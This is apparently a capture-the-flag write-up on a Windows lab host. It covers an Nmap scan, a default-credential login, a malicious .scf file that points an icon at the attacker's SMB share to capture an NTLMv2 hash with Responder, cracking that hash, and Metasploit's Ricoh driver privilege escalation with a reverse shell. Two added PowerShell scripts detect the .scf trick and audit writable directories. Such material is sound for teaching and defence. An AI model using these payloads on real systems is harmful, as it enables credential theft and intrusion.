This article details how to achieve user privilege escalation and root access by conducting information gathering, vulnerability analysis, and exploitation on a Windows system. It describes using Nmap to scan the target host, identify open ports and services, and capture NTLM hashes by uploading a malicious SCF file. Subsequently, the cracked hashes are used to obtain user privileges, followed by privilege escalation. Finally, root privileges are gained by exploiting a vulnerability in a Ricoh printer driver. The article thoroughly outlines the attack flow and methods, providing readers with practical penetration testing techniques and lessons learned.

Information Gathering

# Nmap 7.98 scan initiated Wed Dec 31 09:16:57 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.106
Nmap scan report for 10.10.11.106
Host is up (0.088s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows 10 1607 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows 11 (86%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Vista or Windows 7 (86%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.001 days (since Wed Dec 31 09:15:55 2025)
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2025-12-31T15:47:04
|_  start_date: 2025-12-31T15:45:49
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 6h29m44s, deviation: 0s, median: 6h29m44s

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 31 09:17:57 2025 -- 1 IP address (1 host up) scanned in 60.06 seconds

Vulnerability Analysis

Opening http://10.10.11.106/ and logging in with admin:admin gets us in, and we find that firmware can be uploaded. In addition, the SMB service is enabled.

SCF NTLM Hash Capture

Windows has a behaviour: if a folder contains a .scf (Shell Command File) and Windows Explorer (or some background service) tries to view that folder, the .scf file can direct the system to load a "remote icon".

Attack Flow

  1. Upload a malicious .scf file that says, in effect, "fetch the icon from the attacker's machine".
  2. When the target's background service processes the upload directory, it tries to connect to the Kali box.
  3. When Windows connects to an SMB share, by default it sends the current user's NTLMv2 hash for authentication.
  4. Listening with Responder on Kali captures that hash.
  5. Once we have the hash, crack it to obtain the plaintext password.
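
Defender-side check for the behaviour described above (an added example, not code from the original write-up): a PowerShell script that scans the firmware upload directory for .scf files whose IconFile points at a UNC path, and adds a firewall rule so the server cannot make outbound SMB connections to the Internet. The path in $UploadDir and the rule name are assumptions; the write-up does not say where IIS stores uploaded firmware.

```powershell
# Added example, not from the original write-up.
# Finds .scf files whose IconFile would make Explorer (or any service that renders
# the folder) open an SMB connection to a remote host, then blocks outbound SMB.
param(
    [string]$UploadDir = 'C:\inetpub\wwwroot\firmwares'   # assumption: upload location is not given in the write-up
)

function Get-RemoteIconScf {
    param([Parameter(Mandatory)][string]$Path)

    Get-ChildItem -Path $Path -Recurse -File -Filter '*.scf' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # SCF is INI-like; pull every IconFile= value regardless of section.
            $icons = Select-String -Path $file.FullName -Pattern '^\s*IconFile\s*=\s*(.+)$' |
                ForEach-Object { $_.Matches[0].Groups[1].Value.Trim() }
            foreach ($icon in $icons) {
                # \\host\share\... and file://host/... both trigger an SMB connection
                # and therefore an NTLM authentication to that host.
                if ($icon -match '^\\\\[^\\]+\\' -or $icon -match '^file://') {
                    [pscustomobject]@{
                        File       = $file.FullName
                        IconFile   = $icon
                        RemoteHost = ($icon -replace '^(\\\\|file://)([^\\/]+).*$', '$2')
                    }
                }
            }
        }
}

$hits = Get-RemoteIconScf -Path $UploadDir
if ($hits) {
    $hits | Format-Table -AutoSize
    # Show what would be removed; drop -WhatIf once the hits have been reviewed.
    $hits | ForEach-Object { Remove-Item -LiteralPath $_.File -Force -WhatIf }
}

# Defence in depth: a web server has no reason to speak SMB to the Internet, so a
# planted IconFile should not be able to reach an attacker-controlled share.
New-NetFirewallRule -DisplayName 'Block outbound SMB to Internet' `
    -Direction Outbound -Protocol TCP -RemotePort 445 -RemoteAddress Internet `
    -Action Block -Profile Any
```

The firewall rule uses the `Internet` address keyword, which on a flat lab network (the attacker here sits on a VPN address, 10.10.16.3) would not cover the attacker's host; in that situation the rule should instead limit outbound 445 to the specific file servers the machine legitimately needs. The upload handler itself should also reject .scf, .url and .lnk uploads outright, since a firmware update service has no use for them.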

Exploitation (User Flag)

Upload a malicious .scf file containing the instruction "fetch the icon from the attacker's machine".

➜  Driver nano @exploit.scf
➜  Driver cat @exploit.scf
[Shell]
Command=2
IconFile=\\10.10.16.3\share\test.ico
[Taskbar]
Command=ToggleDesktop

Start the listener, then upload the file

➜  Driver sudo responder -I tun0
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:9df54339562d9c7c:9D14D9809E6DB7E0A35B2866A418F660:0101000000000000002E498F377ADC01C085F55086ACD0BF0000000002000800440044004200320001001E00570049004E002D004C004C00320054004C00480056004C004C005800370004003400570049004E002D004C004C00320054004C00480056004C004C00580037002E0044004400420032002E004C004F00430041004C000300140044004400420032002E004C004F00430041004C000500140044004400420032002E004C004F00430041004C0007000800002E498F377ADC010600040002000000080030003000000000000000000000000020000021B774E55D153D08289FB802C0AFD1AB67A81BF61B6A4381AE931D3BBB07E3BE0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003300000000000000000000000000

Cracking the hash yields tony:liltony

➜  Driver evil-winrm -i 10.10.11.106 -u tony -p 'liltony'

Privilege Escalation (Root Flag)

We try connecting with msfconsole

meterpreter > ps
2848  840   taskhostw.exe            x64   1        DRIVER\tony  C:\Windows\System32\taskhostw.exe
meterpreter > migrate 2848  # migrate into a process in Windows session 1, which is interactive
[*] Migrating from 5036 to 2848...
[*] Migration completed successfully.
msf exploit(multi/handler) > use multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
run
[*] 10.10.11.106 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_comhijack                      Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/bypassuac_fodhelper                      Yes                      The target appears to be vulnerable.
......

Since port 80 hosts a printer firmware service, we can try printer-related vulnerabilities.

Let's look at the PowerShell command history

C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PS C:\Users\tony> type C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'

ping 1.1.1.1
ping 1.1.1.1

So we use

15  exploit/windows/local/ricoh_driver_privesc    Yes   The target appears to be vulnerable. Ricoh driver directory has full permissions
msf exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/ricoh_driver_privesc) > set session 1
session => 1
msf exploit(windows/local/ricoh_driver_privesc) > set lhost tun0
lhost => 10.10.16.3
msf exploit(windows/local/ricoh_driver_privesc) > run
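
The suggester's check result, "Ricoh driver directory has full permissions", describes a directory ACL that low-privileged users can write to. The following PowerShell audit (an added example, not part of the write-up or of the Metasploit module) lists every directory under ProgramData that Everyone, Users or Authenticated Users can modify, which is how a defender finds this condition before an attacker does. The principal list and the choice of ProgramData as the root are assumptions; the write-up does not name the driver's directory.

```powershell
# Added example, not from the original write-up.
# Audit directories that low-privileged principals can write to. A printer driver
# whose data directory is writable by everyone lets any local user drop a DLL that a
# privileged spooler process later loads, which is the class of weakness the
# ricoh_driver_privesc check reports.
param(
    [string]$Root = $env:ProgramData   # assumption: the driver's own path is not given in the write-up
)

# Principals that any interactive local user is a member of (assumed list).
$weakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Modify covers Write/WriteData/CreateFiles; FullControl is a superset of Modify.
# GENERIC_WRITE and GENERIC_ALL appear as raw bits in some ACEs, so include them too.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]::Modify -bor 0x40000000 -bor 0x10000000

function Find-WorldWritableDir {
    param([Parameter(Mandatory)][string]$Path)

    Get-ChildItem -Path $Path -Directory -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $dir = $_
            $acl = Get-Acl -LiteralPath $dir.FullName -ErrorAction SilentlyContinue
            if (-not $acl) { return }
            foreach ($ace in $acl.Access) {
                # Deny ACEs are ignored here for simplicity; review hits by hand.
                if ($ace.AccessControlType -ne 'Allow') { continue }
                if ($weakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
                if (([int]$ace.FileSystemRights -band $writeMask) -ne 0) {
                    [pscustomobject]@{
                        Directory = $dir.FullName
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.FileSystemRights
                    }
                }
            }
        }
}

Find-WorldWritableDir -Path $Root |
    Sort-Object -Property Directory -Unique |
    Format-Table -AutoSize
```

Run it as an administrator so every directory's ACL is readable. Any hit under a vendor driver directory should be fixed by removing the broad Allow entry rather than by adding a Deny, and the same audit is worth running against the spooler's driver store after installing a new printer driver, since the PSReadLine history above shows exactly when that happened on this host.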

Lessons Learned